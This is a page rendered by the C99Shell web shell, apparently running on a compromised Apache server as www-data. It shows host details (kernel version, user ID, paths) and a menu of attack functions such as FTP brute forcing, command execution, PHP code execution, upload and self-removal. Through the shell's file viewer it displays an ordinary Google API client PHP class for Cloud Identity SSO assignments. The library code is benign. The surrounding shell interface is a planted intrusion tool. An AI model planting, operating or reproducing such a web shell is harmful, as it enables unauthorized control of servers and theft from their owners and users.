!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/main_file/vendor/google/apiclient-services/src/CloudIdentity/Resource/   drwxr-xr-x
Free 12.94 GB of 57.97 GB (22.33%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     InboundSsoAssignments.php (5.54 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/*
 * Copyright 2014 Google Inc.
 *
 * Licensed under the Apache License, Version 2.0 (the "License"); you may not
 * use this file except in compliance with the License. You may obtain a copy of
 * the License at
 *
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
 * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
 * License for the specific language governing permissions and limitations under
 * the License.
 */

namespace Google\Service\CloudIdentity\Resource;

use 
Google\Service\CloudIdentity\InboundSsoAssignment;
use 
Google\Service\CloudIdentity\ListInboundSsoAssignmentsResponse;
use 
Google\Service\CloudIdentity\Operation;

/**
 * The "inboundSsoAssignments" collection of methods.
 * Typical usage is:
 *  <code>
 *   $cloudidentityService = new Google\Service\CloudIdentity(...);
 *   $inboundSsoAssignments = $cloudidentityService->inboundSsoAssignments;
 *  </code>
 */
class InboundSsoAssignments extends \Google\Service\Resource
{
  
/**
   * Creates an InboundSsoAssignment for users and devices in a `Customer` under a
   * given `Group` or `OrgUnit`. (inboundSsoAssignments.create)
   *
   * @param InboundSsoAssignment $postBody
   * @param array $optParams Optional parameters.
   * @return Operation
   */
  
public function create(InboundSsoAssignment $postBody$optParams = [])
  {
    
$params = ['postBody' => $postBody];
    
$params array_merge($params$optParams);
    return 
$this->call('create', [$params], Operation::class);
  }
  
/**
   * Deletes an InboundSsoAssignment. To disable SSO, Create (or Update) an
   * assignment that has `sso_mode` == `SSO_OFF`. (inboundSsoAssignments.delete)
   *
   * @param string $name Required. The [resource
   * name](https://cloud.google.com/apis/design/resource_names) of the
   * InboundSsoAssignment to delete. Format: `inboundSsoAssignments/{assignment}`
   * @param array $optParams Optional parameters.
   * @return Operation
   */
  
public function delete($name$optParams = [])
  {
    
$params = ['name' => $name];
    
$params array_merge($params$optParams);
    return 
$this->call('delete', [$params], Operation::class);
  }
  
/**
   * Gets an InboundSsoAssignment. (inboundSsoAssignments.get)
   *
   * @param string $name Required. The [resource
   * name](https://cloud.google.com/apis/design/resource_names) of the
   * InboundSsoAssignment to fetch. Format: `inboundSsoAssignments/{assignment}`
   * @param array $optParams Optional parameters.
   * @return InboundSsoAssignment
   */
  
public function get($name$optParams = [])
  {
    
$params = ['name' => $name];
    
$params array_merge($params$optParams);
    return 
$this->call('get', [$params], InboundSsoAssignment::class);
  }
  
/**
   * Lists the InboundSsoAssignments for a `Customer`.
   * (inboundSsoAssignments.listInboundSsoAssignments)
   *
   * @param array $optParams Optional parameters.
   *
   * @opt_param string filter A CEL expression to filter the results. The only
   * currently-supported filter is filtering by customer. For example:
   * `customer==customers/C0123abc`. Omitting the filter or specifying a filter of
   * `customer==customers/my_customer` will return the assignments for the
   * customer that the caller (authenticated user) belongs to.
   * @opt_param int pageSize The maximum number of assignments to return. The
   * service may return fewer than this value. If omitted (or defaulted to zero)
   * the server will use a sensible default. This default may change over time.
   * The maximum allowed value is 100, though requests with page_size greater than
   * that will be silently interpreted as having this maximum value. This may
   * increase in the futue.
   * @opt_param string pageToken A page token, received from a previous
   * `ListInboundSsoAssignments` call. Provide this to retrieve the subsequent
   * page. When paginating, all other parameters provided to
   * `ListInboundSsoAssignments` must match the call that provided the page token.
   * @return ListInboundSsoAssignmentsResponse
   */
  
public function listInboundSsoAssignments($optParams = [])
  {
    
$params = [];
    
$params array_merge($params$optParams);
    return 
$this->call('list', [$params], ListInboundSsoAssignmentsResponse::class);
  }
  
/**
   * Updates an InboundSsoAssignment. The body of this request is the
   * `inbound_sso_assignment` field and the `update_mask` is relative to that. For
   * example: a PATCH to `/v1/inboundSsoAssignments/0abcdefg1234567_mask=rank`
   * with a body of `{ "rank": 1 }` moves that (presumably group-targeted) SSO
   * assignment to the highest priority and shifts any other group-targeted
   * assignments down in priority. (inboundSsoAssignments.patch)
   *
   * @param string $name Output only. [Resource
   * name](https://cloud.google.com/apis/design/resource_names) of the Inbound SSO
   * Assignment.
   * @param InboundSsoAssignment $postBody
   * @param array $optParams Optional parameters.
   *
   * @opt_param string updateMask Required. The list of fields to be updated.
   * @return Operation
   */
  
public function patch($nameInboundSsoAssignment $postBody$optParams = [])
  {
    
$params = ['name' => $name'postBody' => $postBody];
    
$params array_merge($params$optParams);
    return 
$this->call('patch', [$params], Operation::class);
  }
}

// Adding a class alias for backwards compatibility with the previous class name.
class_alias(InboundSsoAssignments::class, 'Google_Service_CloudIdentity_Resource_InboundSsoAssignments');

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0048 ]--